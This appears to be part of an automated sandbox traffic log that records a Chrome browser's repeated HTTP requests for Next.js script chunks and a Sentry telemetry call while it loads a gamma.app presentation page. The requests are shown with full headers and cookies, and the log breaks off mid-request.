__cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/64bbefcc-ad34eaf1d0f1c936.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /api/5776661/envelope/?sentry_key=824b9acd00f449f283554475ff8303bb&sentry_version=7&sentry_client=sentry.javascript.nextjs%2F7.8.0 HTTP/1.1Host: o698378.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7811-95fc21fe63dec224.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/659-8a6828fad9a08284.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2445-2cebfc2d3c10f6c8.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/995-984ec3894744e0be.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6267-0f348a7fac09425b.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9680-e3c4e12efd5d6c79.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6980-3b5a299f0e1e01a2.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9695-8f8ecdaf663cd4dd.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/316-91fc125afa02f5ee.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8325-4eb976cbb20bec79.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/996-b1f03589c07bff77.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5966-1eaa7198d39fb727.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/572-26a6ed58c4920db8.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3641-46713cb4c5d1216e.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9006-f6aba7c581008a42.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4327-a439db94fcb11d52.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4324-58e867c6ffdd9831.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5884-117f0ad769ed640f.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 